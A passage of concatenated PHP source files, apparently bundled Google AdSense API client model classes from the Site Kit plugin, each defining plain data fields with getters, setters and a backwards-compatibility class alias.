Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListAlertsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'alerts'; protected $alertsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Alert::class; protected $alertsDataType = 'array'; /** * @param Alert[] */ public function setAlerts($alerts) { $this->alerts = $alerts; } /** * @return Alert[] */ public function getAlerts() { return $this->alerts; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAlertsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListAlertsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class CustomChannel extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $active; /** * @var string */ public $displayName; /** * @var string */ public $name; /** * @var string */ public $reportingDimensionId; /** * @param bool */ public function setActive($active) { $this->active = $active; } /** * @return bool */ public function getActive() { return $this->active; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setReportingDimensionId($reportingDimensionId) { $this->reportingDimensionId = $reportingDimensionId; } /** * @return string */ public function getReportingDimensionId() { return $this->reportingDimensionId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_CustomChannel'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdClientAdCode extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $adCode; /** * @var string */ public $ampBody; /** * @var string */ public $ampHead; /** * @param string */ public function setAdCode($adCode) { $this->adCode = $adCode; } /** * @return string */ public function getAdCode() { return $this->adCode; } /** * @param string */ public function setAmpBody($ampBody) { $this->ampBody = $ampBody; } /** * @return string */ public function getAmpBody() { return $this->ampBody; } /** * @param string */ public function setAmpHead($ampHead) { $this->ampHead = $ampHead; } /** * @return string */ public function getAmpHead() { return $this->ampHead; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClientAdCode::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdClientAdCode'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class SavedReport extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $title; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\SavedReport::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_SavedReport'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListAdUnitsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'adUnits'; protected $adUnitsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class; protected $adUnitsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param AdUnit[] */ public function setAdUnits($adUnits) { $this->adUnits = $adUnits; } /** * @return AdUnit[] */ public function getAdUnits() { return $this->adUnits; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdUnitsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListAdUnitsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdClient extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $productCode; /** * @var string */ public $reportingDimensionId; /** * @var string */ public $state; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setProductCode($productCode) { $this->productCode = $productCode; } /** * @return string */ public function getProductCode() { return $this->productCode; } /** * @param string */ public function setReportingDimensionId($reportingDimensionId) { $this->reportingDimensionId = $reportingDimensionId; } /** * @return string */ public function getReportingDimensionId() { return $this->reportingDimensionId; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClient::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdClient'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListPolicyIssuesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'policyIssues'; /** * @var string */ public $nextPageToken; protected $policyIssuesType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyIssue::class; protected $policyIssuesDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param PolicyIssue[] */ public function setPolicyIssues($policyIssues) { $this->policyIssues = $policyIssues; } /** * @return PolicyIssue[] */ public function getPolicyIssues() { return $this->policyIssues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPolicyIssuesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListPolicyIssuesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Date extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $day; /** * @var int */ public $month; /** * @var int */ public $year; /** * @param int */ public function setDay($day) { $this->day = $day; } /** * @return int */ public function getDay() { return $this->day; } /** * @param int */ public function setMonth($month) { $this->month = $month; } /** * @return int */ public function getMonth() { return $this->month; } /** * @param int */ public function setYear($year) { $this->year = $year; } /** * @return int */ public function getYear() { return $this->year; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Date'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class HttpBody extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'extensions'; /** * @var string */ public $contentType; /** * @var string */ public $data; /** * @var array[] */ public $extensions; /** * @param string */ public function setContentType($contentType) { $this->contentType = $contentType; } /** * @return string */ public function getContentType() { return $this->contentType; } /** * @param string */ public function setData($data) { $this->data = $data; } /** * @return string */ public function getData() { return $this->data; } /** * @param array[] */ public function setExtensions($extensions) { $this->extensions = $extensions; } /** * @return array[] */ public function getExtensions() { return $this->extensions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\HttpBody::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_HttpBody'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListLinkedAdUnitsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'adUnits'; protected $adUnitsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnit::class; protected $adUnitsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param AdUnit[] */ public function setAdUnits($adUnits) { $this->adUnits = $adUnits; } /** * @return AdUnit[] */ public function getAdUnits() { return $this->adUnits; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedAdUnitsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListLinkedAdUnitsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListAdClientsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'adClients'; protected $adClientsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdClient::class; protected $adClientsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param AdClient[] */ public function setAdClients($adClients) { $this->adClients = $adClients; } /** * @return AdClient[] */ public function getAdClients() { return $this->adClients; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAdClientsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListAdClientsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListPaymentsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'payments'; protected $paymentsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Payment::class; protected $paymentsDataType = 'array'; /** * @param Payment[] */ public function setPayments($payments) { $this->payments = $payments; } /** * @return Payment[] */ public function getPayments() { return $this->payments; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPaymentsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListPaymentsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class TimeZone extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $id; /** * @var string */ public $version; /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setVersion($version) { $this->version = $version; } /** * @return string */ public function getVersion() { return $this->version; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\TimeZone::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_TimeZone'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListCustomChannelsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customChannels'; protected $customChannelsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class; protected $customChannelsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param CustomChannel[] */ public function setCustomChannels($customChannels) { $this->customChannels = $customChannels; } /** * @return CustomChannel[] */ public function getCustomChannels() { return $this->customChannels; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListCustomChannelsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListCustomChannelsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class PolicyIssue extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'policyTopics'; /** * @var string */ public $action; /** * @var string[] */ public $adClients; /** * @var string */ public $adRequestCount; /** * @var string */ public $entityType; protected $firstDetectedDateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $firstDetectedDateDataType = ''; protected $lastDetectedDateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $lastDetectedDateDataType = ''; /** * @var string */ public $name; protected $policyTopicsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyTopic::class; protected $policyTopicsDataType = 'array'; /** * @var string */ public $site; /** * @var string */ public $siteSection; /** * @var string */ public $uri; protected $warningEscalationDateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $warningEscalationDateDataType = ''; /** * @param string */ public function setAction($action) { $this->action = $action; } /** * @return string */ public function getAction() { return $this->action; } /** * @param string[] */ public function setAdClients($adClients) { $this->adClients = $adClients; } /** * @return string[] */ public function getAdClients() { return $this->adClients; } /** * @param string */ public function setAdRequestCount($adRequestCount) { $this->adRequestCount = $adRequestCount; } /** * @return string */ public function getAdRequestCount() { return $this->adRequestCount; } /** * @param string */ public function setEntityType($entityType) { $this->entityType = $entityType; } /** * @return string */ public function getEntityType() { return $this->entityType; } /** * @param Date */ public function setFirstDetectedDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $firstDetectedDate) { $this->firstDetectedDate = $firstDetectedDate; } /** * @return Date */ public function getFirstDetectedDate() { return $this->firstDetectedDate; } /** * @param Date */ public function setLastDetectedDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $lastDetectedDate) { $this->lastDetectedDate = $lastDetectedDate; } /** * @return Date */ public function getLastDetectedDate() { return $this->lastDetectedDate; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param PolicyTopic[] */ public function setPolicyTopics($policyTopics) { $this->policyTopics = $policyTopics; } /** * @return PolicyTopic[] */ public function getPolicyTopics() { return $this->policyTopics; } /** * @param string */ public function setSite($site) { $this->site = $site; } /** * @return string */ public function getSite() { return $this->site; } /** * @param string */ public function setSiteSection($siteSection) { $this->siteSection = $siteSection; } /** * @return string */ public function getSiteSection() { return $this->siteSection; } /** * @param string */ public function setUri($uri) { $this->uri = $uri; } /** * @return string */ public function getUri() { return $this->uri; } /** * @param Date */ public function setWarningEscalationDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $warningEscalationDate) { $this->warningEscalationDate = $warningEscalationDate; } /** * @return Date */ public function getWarningEscalationDate() { return $this->warningEscalationDate; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_PolicyIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdsenseEmpty extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdsenseEmpty::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdsenseEmpty'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListAccountsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accounts'; protected $accountsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Account::class; protected $accountsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Account[] */ public function setAccounts($accounts) { $this->accounts = $accounts; } /** * @return Account[] */ public function getAccounts() { return $this->accounts; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAccountsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListAccountsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ContentAdsSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $size; /** * @var string */ public $type; /** * @param string */ public function setSize($size) { $this->size = $size; } /** * @return string */ public function getSize() { return $this->size; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ContentAdsSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ContentAdsSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListChildAccountsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'accounts'; protected $accountsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Account::class; protected $accountsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Account[] */ public function setAccounts($accounts) { $this->accounts = $accounts; } /** * @return Account[] */ public function getAccounts() { return $this->accounts; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListChildAccountsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListChildAccountsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListUrlChannelsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'urlChannels'; /** * @var string */ public $nextPageToken; protected $urlChannelsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\UrlChannel::class; protected $urlChannelsDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param UrlChannel[] */ public function setUrlChannels($urlChannels) { $this->urlChannels = $urlChannels; } /** * @return UrlChannel[] */ public function getUrlChannels() { return $this->urlChannels; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListUrlChannelsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListUrlChannelsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListSitesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sites'; /** * @var string */ public $nextPageToken; protected $sitesType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Site::class; protected $sitesDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Site[] */ public function setSites($sites) { $this->sites = $sites; } /** * @return Site[] */ public function getSites() { return $this->sites; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSitesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListSitesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Cell extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Cell::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Cell'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class UrlChannel extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $reportingDimensionId; /** * @var string */ public $uriPattern; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setReportingDimensionId($reportingDimensionId) { $this->reportingDimensionId = $reportingDimensionId; } /** * @return string */ public function getReportingDimensionId() { return $this->reportingDimensionId; } /** * @param string */ public function setUriPattern($uriPattern) { $this->uriPattern = $uriPattern; } /** * @return string */ public function getUriPattern() { return $this->uriPattern; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\UrlChannel::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_UrlChannel'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Row extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'cells'; protected $cellsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Cell::class; protected $cellsDataType = 'array'; /** * @param Cell[] */ public function setCells($cells) { $this->cells = $cells; } /** * @return Cell[] */ public function getCells() { return $this->cells; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Row::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Row'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * 